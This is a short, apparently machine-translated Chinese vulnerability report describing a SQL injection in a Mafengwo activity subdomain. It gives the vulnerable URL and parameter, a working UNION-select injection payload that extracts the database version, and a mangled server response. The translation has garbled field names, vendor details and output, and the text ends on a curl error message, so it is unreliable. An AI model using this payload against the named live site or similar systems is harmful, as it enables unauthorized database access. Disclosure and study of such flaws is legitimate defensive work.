漏洞标题 天线的子站(UNION)中存在SQL注入漏洞 相关制造商 蚂蚁蜂窝 漏洞作者 猪人 提交时间 2016-04-25 10: 01 公共时间 2016-06-09 10: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 #1漏洞网站 http://activity.mafengwo.cn #2注射点 http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1 #3注射参数 援助=1 漏洞证明: #数据库版本 http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1%20and%201=2%20union%20select%201,2,version(),4,5,6,7,8%23 {'data':' \ n \ n < \/DIV> \ n 21年5月5日日志< \/p为H.< \/DIV> \ n < \ I&GT /; 7 \ u7968< \/p>< \/div> \ n< \/li> \ n< \/ul> \ n','msg':'','code': 1} 数据存储名称 Failure when receiving data from the peer